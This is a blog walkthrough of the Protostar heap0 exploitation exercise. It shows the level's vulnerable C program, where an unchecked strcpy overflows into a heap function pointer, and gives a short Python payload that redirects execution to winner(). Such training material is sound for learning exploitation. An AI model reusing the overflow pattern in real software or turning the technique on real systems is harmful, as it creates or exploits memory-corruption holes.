Skip to main content

Binary Exploitation Protostar Heap0 - Walkthrough - Writeups

Hello Guyz,

Welcome again to my blog. Today, I am going to share with you my walkthrough experience of Exploit-Exercise Protostar Heap0 Level.

In This Level, Our Task Is to Execute Winner Function Through Heap Overflow Concept.

Before Starting Our Walkthrough Let's Take a Look At Hints And Details.

Note: I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
  • Understand all previous levels before starting this one.
  • Do some research on Assembly, C/C++ and Gdb
  • Do Some Research About Heap overflow exploitation.

Source Code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

struct data {
  char name[64];

struct fp {
  int (*fp)();

void winner()
  printf("level passed\n");

void nowinner()
  printf("level has not been passed\n");

int main(int argc, char **argv)
  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  printf("data is at %p, fp is at %p\n", d, f);

  strcpy(d->name, argv[1]);



This level introduces heap overflows and how they can influence code flow.

This level is at /opt/protostar/bin/heap0

Code Review

  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));   <--- Locating Space For data struct
  f = malloc(sizeof(struct fp));     <--- Locating Space For Fp Struct Just After The Data Struct.
  f->fp = nowinner;                  <--- Assign Nowinner Function Pointer To FP Struct

  printf("data is at %p, fp is at %p\n", d, f);

  strcpy(d->name, argv[1]);          <--- No Input Size verification. 
  f->fp();                           <--- Calling Inner function


As You Can See, In Source Code Their Is Nothing To Verify User Input. Hence, We can Easily Heap Overflow And Write Winner Function Address.


  Heap Overview
 | Name[64]              | FP  |
  Overflow Name And Write Data To FP


import struct
# /opt/protostar/bin/heap0 $(python

buf = "a"*72
win = 0x08048464
ret = struct.pack("I",win)

payload = ''
payload+= buf
payload+= ret
print payload

For More Detailed Walk through Check Below Provided YouTube Video Playlist


Related Post

Top Visited

how to install burp suite in Linux/Ubuntu 16.04

Create Simple Packet Sniffer Using Python

Big List Of Google Dorks For Sqli Injection

List of Keyboard Shortcuts Keys for GNOME Desktop (Kali linux / Linux / Ubuntu/*nix )

Latest Google Dorks List

How to create Phishing Page Using Kali Linux | Webpage Page Cloning Using Kali Linux Social Engineering Toolkit

how to configure burpsuite with firefox?

What is the use of Pseudo header in TCP/UDP packets?

Python Beautiful Soup Module - Tutorial - Part 2

Create Ping Sweeping Script Using Python